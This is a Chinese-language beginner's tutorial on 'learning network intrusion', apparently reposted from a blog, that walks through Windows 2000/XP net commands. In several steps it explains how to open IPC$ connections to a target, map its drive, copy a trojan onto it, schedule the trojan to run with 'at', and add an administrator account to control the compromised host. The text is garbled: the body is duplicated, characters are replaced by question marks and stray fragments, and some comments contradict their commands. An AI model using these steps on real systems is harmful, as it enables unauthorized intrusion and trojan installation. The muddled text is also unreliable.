菜鸟的重要阶段
第一節(jié)
菜鳥必學的網絡命令
要學習網絡入侵,首先我們必須學習一些基礎的網絡命令,我們所謂的基礎命令其實也就是WIN 2K,WIN XP系統(tǒng)下的一些DOS命令,這個命令都又CMD.exe來完成
概念部分:
(1)2000、XP下的CMD與98的MS-DOS的不同之處:
cmd.exe叫命令提示符他與98下的MS-DOS是不一樣的,所以我們不能將他混為一談,但是我們卻可以用CMD.exe來執(zhí)行很多DOS命令,例如:dir、cd、del等等!
(2)CMD下的內部命令與外部命令的不同:
CMD下的內部命令就是指:我們可以直接在CMD下就可以執(zhí)行的命令,例如:telnet、ftp、dir、cd、等等,你可以在CMD下輸入help進行查看,外部命令呢,就是cmd下不能直接運行的命令,(例如大家常用的nc)他需要在CMD下切換到他(NC)做在的目錄你才能運行NC及NC的命令?
實操部分:
(一):常用入侵防護命令:
Net 、telnet 、at、copy、ftp、finger、del~~~~~~
一些常用的Net命令與例子:
(1)建立IPC連接的命令?
Net use //IP/ipc$ “” /user:username
例如:
Net use //127.0.0.1/ipc$ 123456 /user :administrator
這個命令的意思就是與用戶名為adminidtrator用戶密碼為123456的主機127.0.0.1建立ipc$空連接
(2) 刪除IPC$空連接
Net use //ip /del
例如:
Net use //127.0.0.1 /del
刪除與主機127.0.0.1已經建立的Ipc$連接
(3) 啟動關閉服務:
Net start????????????????????????//查看已經開啟的服務
Net start servername
Net stop servername
例如:
Net start telnet????????????????????//開啟telnet服務
Net stop telnet????????????????????//關閉telnet服務
(4)啟動關閉共享
Net shate ipc$Content$nbsp;???????????????????//開啟ipc$默認共享
Net share ipc$ /del????????????????//關閉ipc$默認共享
Net share c=c:/???????????????????//完全共享c盤
Net share d=d:/???????????????????//刪除完全共享的d盤
(4) 映射硬盤
Net use z: //ip/c$
例如:
Net use z: //127.0.0.1/c$Content$nbsp;???????????//把127.0.0.1的C盤映射成本機的z盤
說明:映射成功后,你在我的電腦里面里面就會多出一個硬盤Z,其實Z就是127.0.0.1的C盤!
Net use z: /del????????????????????//斷開映射
入侵中的作用:把對方的硬盤映射過來以后我們就能直接復制文件到對方的硬盤下面了
成功實現(xiàn)的條件:必須與對方建立ipc$連接
(5) 遠程復制文件_Copy
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp;??//將本地的E盤下的3389.exe這個文件copy到對方系統(tǒng)的C盤根目錄下
????Copy在入侵中的作用:把本地文件復制到對方硬盤
Copy復制成功所需的條件:必須與主機建立ipc$連接
(6) 查看遠程系統(tǒng)的時間
???Net??time //IP
???Net??time //127.0.0.1???????????????//查看遠程主機127.0.0.1的本地時間
???作用:得到對方時間好為自己計劃任務種下木馬做準備
(7) 遠程運行程序
???At //ip time server.exe
???At //127.0.0.1 12:30 c:/server.exe???????//讓主機在中午12:30分運行我們已經復制到他C?
盤根目錄下的木馬server.exe?
在入侵中作用:這樣我們就可以用我們的木馬服務端來連接我們木馬,,更好的使用圖形方式來控制肉雞
(8)添加管理員帳號:
?????Net user username 1234 /add????????????????//添加一個密碼為1234名字為??username的用戶
?????Net localgroup administrators juntuan /add????//把username這個用戶添加到管 理員組
?????注意:有些系統(tǒng)的管理員組不是administrators你要根據(jù)實際情況來改,不過99.9%的系統(tǒng)的管理員組還是administrators的。
?????修改用戶密碼:
?????Net user username 1234?????????????????????//把用戶username的密碼修改成1233。
(9)遠程登陸主機_telnet
?????telnet IP port
?????例如:telnet 127.0.0.1 1234????????????//連接登陸127.0.0.1的1234端口
?????(當目標主機的端口是默認的23的時候我們不需要+端口即:telnet IP 就好)
(10)傳輸文件命令_ftp
??????其實這個我個人覺得用途不大,畢竟當你拿到了FTP密碼之后你可以用flashftp或者cutftp有一個圖形截面的交互如何不好呢?
??????首先在CMD里面輸入ftp
??????然后輸入:open IP port
??????例如:open 127.0.0.1 1234????????????//連接登陸127.0.0.1的1234端口
??????如何開啟windows系統(tǒng)自帶的ftp服務:
??????Net start msftppsvc
(11)????????查看文件夾的屬性_cacls
Cacls xiaod?????????????????//查看xiaod這個文件夾的屬性
???????參數(shù)說明:F:(完全控制)R:(只讀)C:(允許更改)W:(允許寫入)N:(沒有任何權限)
(12)????????刪除文件_del
Del是用來刪除文件命令
??????首先進入你想刪除的文件的目錄
??????Del xiaod.txt???????????????????//刪除xiaod.txt這個個文件
??????Del xiaod.txt /f?????//強制刪除xiaod.txt這個個文件(當該文件無法正常刪除的時候使用該命令)
(13) finger命令
?????Finger是一個信息刺探命令一般在對方開啟了79端口時命令使用
?????Finger –l user @computer
?????參數(shù)詳解: -l 用長列表格式顯示消息
????????????????User:指定用戶的信息
?????成功實現(xiàn)的條件:對方必須安裝tcp/ip協(xié)議
(14):文件寫入命令_echo:
Echo 你好 > index.htm??????//用你好來覆蓋index.htm的內容
Echo 你好 >>index.htm?????//將“你好”添加到index.htm
(15):寫入注冊表文件_regedit
???????Regedit /s filename.reg?????????//s是寫入參數(shù)
(16):端口映射_chgport
?????Chgport 3=5???//將端口3映射到5
?????Chgport /d*????//刪除所有端口映射
(17):文件映射_subst
?????Subst b:/ c:/winnt?????//這個時候當你訪問硬盤B的時候你就是訪問了??c:/winnt目錄
(18):查看當前正在使用的帳號:
?????Query session?????//查看帳號
(19):踢掉指定用:
?????Logoff id?????????//注意ID,是在用query session查看到的用戶的id而不是用戶名。
(20):發(fā)送消息給某用戶或者內網主機
??????Net send hostname or /IP message
菜鳥必學的網絡命令
要學習網絡入侵,首先我們必須學習一些基礎的網絡命令,我們所謂的基礎命令其實也就是WIN 2K,WIN XP系統(tǒng)下的一些DOS命令,這個命令都又CMD.exe來完成
概念部分:
(1)2000、XP下的CMD與98的MS-DOS的不同之處:
cmd.exe叫命令提示符他與98下的MS-DOS是不一樣的,所以我們不能將他混為一談,但是我們卻可以用CMD.exe來執(zhí)行很多DOS命令,例如:dir、cd、del等等!
(2)CMD下的內部命令與外部命令的不同:
CMD下的內部命令就是指:我們可以直接在CMD下就可以執(zhí)行的命令,例如:telnet、ftp、dir、cd、等等,你可以在CMD下輸入help進行查看,外部命令呢,就是cmd下不能直接運行的命令,(例如大家常用的nc)他需要在CMD下切換到他(NC)做在的目錄你才能運行NC及NC的命令?
實操部分:
(一):常用入侵防護命令:
Net 、telnet 、at、copy、ftp、finger、del~~~~~~
一些常用的Net命令與例子:
(1)建立IPC連接的命令?
Net use //IP/ipc$ “” /user:username
例如:
Net use //127.0.0.1/ipc$ 123456 /user :administrator
這個命令的意思就是與用戶名為adminidtrator用戶密碼為123456的主機127.0.0.1建立ipc$空連接
(2) 刪除IPC$空連接
Net use //ip /del
例如:
Net use //127.0.0.1 /del
刪除與主機127.0.0.1已經建立的Ipc$連接
(3) 啟動關閉服務:
Net start????????????????????????//查看已經開啟的服務
Net start servername
Net stop servername
例如:
Net start telnet????????????????????//開啟telnet服務
Net stop telnet????????????????????//關閉telnet服務
(4)啟動關閉共享
Net shate ipc$Content$nbsp;???????????????????//開啟ipc$默認共享
Net share ipc$ /del????????????????//關閉ipc$默認共享
Net share c=c:/???????????????????//完全共享c盤
Net share d=d:/???????????????????//刪除完全共享的d盤
(4) 映射硬盤
Net use z: //ip/c$
例如:
Net use z: //127.0.0.1/c$Content$nbsp;???????????//把127.0.0.1的C盤映射成本機的z盤
說明:映射成功后,你在我的電腦里面里面就會多出一個硬盤Z,其實Z就是127.0.0.1的C盤!
Net use z: /del????????????????????//斷開映射
入侵中的作用:把對方的硬盤映射過來以后我們就能直接復制文件到對方的硬盤下面了
成功實現(xiàn)的條件:必須與對方建立ipc$連接
(5) 遠程復制文件_Copy
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp;??//將本地的E盤下的3389.exe這個文件copy到對方系統(tǒng)的C盤根目錄下
????Copy在入侵中的作用:把本地文件復制到對方硬盤
Copy復制成功所需的條件:必須與主機建立ipc$連接
(6) 查看遠程系統(tǒng)的時間
???Net??time //IP
???Net??time //127.0.0.1???????????????//查看遠程主機127.0.0.1的本地時間
???作用:得到對方時間好為自己計劃任務種下木馬做準備
(7) 遠程運行程序
???At //ip time server.exe
???At //127.0.0.1 12:30 c:/server.exe???????//讓主機在中午12:30分運行我們已經復制到他C?
盤根目錄下的木馬server.exe?
在入侵中作用:這樣我們就可以用我們的木馬服務端來連接我們木馬,,更好的使用圖形方式來控制肉雞
(8)添加管理員帳號:
?????Net user username 1234 /add????????????????//添加一個密碼為1234名字為??username的用戶
?????Net localgroup administrators juntuan /add????//把username這個用戶添加到管 理員組
?????注意:有些系統(tǒng)的管理員組不是administrators你要根據(jù)實際情況來改,不過99.9%的系統(tǒng)的管理員組還是administrators的。
?????修改用戶密碼:
?????Net user username 1234?????????????????????//把用戶username的密碼修改成1233。
(9)遠程登陸主機_telnet
?????telnet IP port
?????例如:telnet 127.0.0.1 1234????????????//連接登陸127.0.0.1的1234端口
?????(當目標主機的端口是默認的23的時候我們不需要+端口即:telnet IP 就好)
(10)傳輸文件命令_ftp
??????其實這個我個人覺得用途不大,畢竟當你拿到了FTP密碼之后你可以用flashftp或者cutftp有一個圖形截面的交互如何不好呢?
??????首先在CMD里面輸入ftp
??????然后輸入:open IP port
??????例如:open 127.0.0.1 1234????????????//連接登陸127.0.0.1的1234端口
??????如何開啟windows系統(tǒng)自帶的ftp服務:
??????Net start msftppsvc
(11)????????查看文件夾的屬性_cacls
Cacls xiaod?????????????????//查看xiaod這個文件夾的屬性
???????參數(shù)說明:F:(完全控制)R:(只讀)C:(允許更改)W:(允許寫入)N:(沒有任何權限)
(12)????????刪除文件_del
Del是用來刪除文件命令
??????首先進入你想刪除的文件的目錄
??????Del xiaod.txt???????????????????//刪除xiaod.txt這個個文件
??????Del xiaod.txt /f?????//強制刪除xiaod.txt這個個文件(當該文件無法正常刪除的時候使用該命令)
(13) finger命令
?????Finger是一個信息刺探命令一般在對方開啟了79端口時命令使用
?????Finger –l user @computer
?????參數(shù)詳解: -l 用長列表格式顯示消息
????????????????User:指定用戶的信息
?????成功實現(xiàn)的條件:對方必須安裝tcp/ip協(xié)議
(14):文件寫入命令_echo:
Echo 你好 > index.htm??????//用你好來覆蓋index.htm的內容
Echo 你好 >>index.htm?????//將“你好”添加到index.htm
(15):寫入注冊表文件_regedit
???????Regedit /s filename.reg?????????//s是寫入參數(shù)
(16):端口映射_chgport
?????Chgport 3=5???//將端口3映射到5
?????Chgport /d*????//刪除所有端口映射
(17):文件映射_subst
?????Subst b:/ c:/winnt?????//這個時候當你訪問硬盤B的時候你就是訪問了??c:/winnt目錄
(18):查看當前正在使用的帳號:
?????Query session?????//查看帳號
(19):踢掉指定用:
?????Logoff id?????????//注意ID,是在用query session查看到的用戶的id而不是用戶名。
(20):發(fā)送消息給某用戶或者內網主機
??????Net send hostname or /IP message
??????例如:net send xiaod or /127.0.0.1 hello!
本文轉自loveme2351CTO博客,原文鏈接:http://blog.51cto.com/loveme23/8551?,如需轉載請自行聯(lián)系原作者
總結
- 上一篇: JS的document.all函数使用
- 下一篇: Shiro 配置